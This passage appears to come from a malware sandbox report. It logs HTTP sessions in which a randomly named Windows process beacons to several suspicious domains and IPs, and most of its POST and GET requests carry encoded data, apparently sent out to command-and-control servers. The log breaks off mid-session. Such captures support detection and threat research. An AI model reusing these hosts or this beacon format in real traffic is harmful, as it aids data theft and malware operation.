                                                                                  12          192.168.2.5  49994        20.2.36.112     80                3160  C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Nov 13, 2024 15:34:59.095902920 CET  438                OUT        GET /a4nt/?2J=Y8ucfnop1/b3pfYFq01F/gO8ESspnEO25i/hccpQHURd3Ee6lJ0YewpZ26P6KIWp1n+YeG7L7VclPhA1nqTCAuTU030Z3lnUxyF2WW91OhunyyCxSBLPY4XFmWmPj9k/og==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mdpc7.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:00.061930895 CET | 336 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Length: 162
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Date: Wed, 13 Nov 2024 14:34:59 GMT
                                                                                  Server: nginx
                                                                                  X-Cache: BYPASS
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.5 | 49995 | 203.161.46.205 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:05.323255062 CET | 700 | OUT | POST /uaef/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.ecojomos.xyz
                                                                                  Origin: http://www.ecojomos.xyz
                                                                                  Referer: http://www.ecojomos.xyz/uaef/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=+lH1PsMkxuo/r2Vi+4xd5KVIwvWI6Li/ZDMxEAUEpL1VZj/nA701fyDrpRN+YYiU+e+GO8QHQK5sf+N3SrYopVsfV1zgEbrDFq+xrD1H8GxNkZWLpoEWBaox4KxyuSfk+2ID71Kv7QAu54+TyTW0wpE9HVcC12gMp6DvawpipHoNBX+b1PqpdknlfUV4Ylv2iUq4IqQ=
                                                                                  Nov 13, 2024 15:35:05.997848034 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:05 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.5 | 49996 | 203.161.46.205 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:07.866269112 CET | 720 | OUT | POST /uaef/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.ecojomos.xyz
                                                                                  Origin: http://www.ecojomos.xyz
                                                                                  Referer: http://www.ecojomos.xyz/uaef/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=+lH1PsMkxuo/tnlitJxd/qVLu/WIoLi7ZDAxEFlBpZhVZDPnOa01PiDr8hMVcYih+eykO+EHQKFsf+93ScMvrFsdAlzibLrDFq+xrDgo8GZN49SLrNoVN6oy5KxyqSet+2Ih70X07Tou59CTyiW3pZE7DVdIjzJelIPZHDAmoRt2NBPxvtiBOELdPHdPJVOf436IW9Fy+0LSqsN6948DsL2AZstg
                                                                                  Nov 13, 2024 15:35:08.532572985 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:08 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.5 | 49997 | 203.161.46.205 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:10.414585114 CET | 1737 | OUT | POST /uaef/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.ecojomos.xyz
                                                                                  Origin: http://www.ecojomos.xyz
                                                                                  Referer: http://www.ecojomos.xyz/uaef/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:11.091475964 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:11 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49998 | 203.161.46.205 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 15:35:13.930963039 CET | 441 | OUT | GET /uaef/?2J=znvVMZI6wclGwSNQgZtr5fBMguex2NmDUWcQCD5rzoJFeirSAcNEfn/4jSETcpej++6Zf7EsBdpUeNRucPEp0Vp7Iz2INonuboPmggNf5Eh/heiOubkxKPwt67wGlkSjkQ==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.ecojomos.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
Nov 13, 2024 15:35:14.616981030 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:14 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49999 | 68.66.226.92 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 15:35:20.253917933 CET | 691 | OUT | POST /k81y/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.717hy.net
                                                                                  Origin: http://www.717hy.net
                                                                                  Referer: http://www.717hy.net/k81y/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=vhbu6fAvexi0+byHvsM+m19/gIwXPeY5E77dnGXQKRS5ECpC4kUGyVShrxQzzGrJts/E0G12jO7EEd60Q3TM27InTEMI9eGEUw8ALpJZTdSqDkNDcEy3nIFSMNDKuSJqwBv+kc2bamN7klEjiAqY1CZKei3cNIhBvPyBMTnMmPv6uK522FmRLQnvflyxa3ZTnyp4/1c=
Nov 13, 2024 15:35:20.874661922 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:20 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 50000 | 68.66.226.92 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 15:35:22.807187080 CET | 711 | OUT | POST /k81y/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.717hy.net
                                                                                  Origin: http://www.717hy.net
                                                                                  Referer: http://www.717hy.net/k81y/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=vhbu6fAvexi0/7CHgv0+3F98lIwXauY1E73dnDuILjm5djZC5mwGxVShyBQ2u2r4tszi0C12jOvEEdK0Qk7NkbIlfkMK3+GEUw8ALpM0TdaqDU9Dcly2kIFRYdDKqSJmwBurkdq1akl7klUjiU+f+CZMBy2iO7ITwOeKAS+3yPfpv8Icsnu5YwLXP26GLH469R5IhiJoDuBi/jMcdAPYamUzbXSC
Nov 13, 2024 15:35:23.457957029 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:23 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50001 | 68.66.226.92 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 15:35:25.348265886 CET | 1728 | OUT | POST /k81y/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.717hy.net
                                                                                  Origin: http://www.717hy.net
                                                                                  Referer: http://www.717hy.net/k81y/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:25.979759932 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:25 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.2.5 | 50002 | 68.66.226.92 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:27.893192053 CET | 438 | OUT | GET /k81y/?2J=ijzO5vt4Wia988ezl94/5B5fhr01XtFEJs702F2lFCeAUQR2wSJY5h+0sGUliGD5vvb7tm1pzcvQX+qpOWiQ3K4hemU8wbaBHwJuA5BCX/yteUBDcWPxvtRpccaohSYfjw==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.717hy.net
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:28.520843983 CET | 1159 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:28 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.5 | 50003 | 109.70.26.37 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:33.745203018 CET | 712 | OUT | POST /i6b4/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/i6b4/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=mZ6uF3Yr4b57GcM5T/MANN/u9dgKQrBDyYsPsK+UQB6ayEgf1idOBWv6g79XVEfjsmrwCDH5VQmFvF56rFoF7UB0H8oXuwVpix2Ld5MJWRuxApU3Og2WpM9KKxPSk5r6uf/Bi8aBHVePbsppsaOR0l209YI/EjTNS1NeI99CzaEHQM2nHvgAKSDcQ/2n1Thm3oJAjvc=
                                                                                  Nov 13, 2024 15:35:34.630711079 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.5 | 50004 | 109.70.26.37 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:36.283857107 CET | 732 | OUT | POST /i6b4/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/i6b4/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=mZ6uF3Yr4b57E8c5IeMALt/xhNgKL7BHyYoPsOuERyeayhcfnQlOCWv6ob9WbkfSsm2PCG/5VQyFvHh6o0oa9EB2SMoVjQVpix2Ld5ZsWXGxDYE3IB2X3c9JdBPSg5r+uf/3i5nkHX2PbtZptLOQtV2Iz4JTC22gLT9rKc0clbl5caHNdNooZyvkAs+QkjAPtLZw94I+/VOowPa2/gDXm+a4I3N0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.5 | 50005 | 109.70.26.37 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:38.830744028 CET | 1749 | OUT | POST /i6b4/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/i6b4/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:39.705178022 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.2.5 | 50006 | 109.70.26.37 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:41.379340887 CET | 445 | OUT | GET /i6b4/?2J=rbSOGHQf+oAIPcBZM/BWO4v0sc0ZI7pa6YU0oIiGfR+Ewkw1zlM3KmPagJJbTGfXhG2rczLZFwuqulMMl1sHkUxyatg9ogB88gOJZKl7SEK9bLYaCAnWqdxVYxi0oqyA/g==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:42.293850899 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  25 | 192.168.2.5 | 50007 | 20.2.249.7 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:50.194214106 CET | 694 | OUT | POST /ocnr/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.7vh2wy.top
                                                                                  Origin: http://www.7vh2wy.top
                                                                                  Referer: http://www.7vh2wy.top/ocnr/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=3Haj4ah4jPOCi80X9Tbh/hjACqtUv2T02YoRh0wULfyS3Fpli5wbvgG6TP1W19+rhZxYFGgx+kVgiLlp5KUwrQelUQYcclLiUyQRj0BlgPe4o5z2/v2WLxJnWGbckthtxsrqFjB+lFJRlWjobzxdOWbOyrysl8FrtI+Vpy3zhwwNUlo6WrMUWP6LYu8+Baeph5RJIXQ=
                                                                                  Nov 13, 2024 15:35:51.152548075 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:50 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.2.5 | 50008 | 20.2.249.7 | 80 | 3160 | C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:52.745970011 CET | 714 | OUT | POST /ocnr/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.7vh2wy.top
                                                                                  Origin: http://www.7vh2wy.top
                                                                                  Referer: http://www.7vh2wy.top/ocnr/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Ascii: 2J=3Haj4ah4jPOCkYIX4xzh4BjDHqtU2mTw2YURh11fLsWS3kZlwLYbqgG6bv1f4d+ahZN+FF4x+npgiOBp59gxqAenZwYeYlLiUyQRj1hPgPW4oIj2taWZHRJgembcz9hpxsqQFidQlHxRlTfobixeEWby8Ly9huwYt5uO0DyR/R0eYzZQMJE8FvWzI90JQq/A7aB5WAHnwdNRgV8NLNO4f5H/w6aC
                                                                                  Nov 13, 2024 15:35:53.713681936 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID: 27 | Source IP: 192.168.2.5 | Source Port: 50009 | Destination IP: 20.2.249.7 | Destination Port: 80 | PID: 3160 | Process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 13, 2024 15:35:55.291901112 CET | 1731 | OUT | POST /ocnr/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.7vh2wy.top
                                                                                  Origin: http://www.7vh2wy.top
                                                                                  Referer: http://www.7vh2wy.top/ocnr/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:56.258064985 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:56 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session ID: 28 | Source IP: 192.168.2.5 | Source Port: 50010 | Destination IP: 20.2.249.7 | Destination Port: 80 | PID: 3160 | Process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
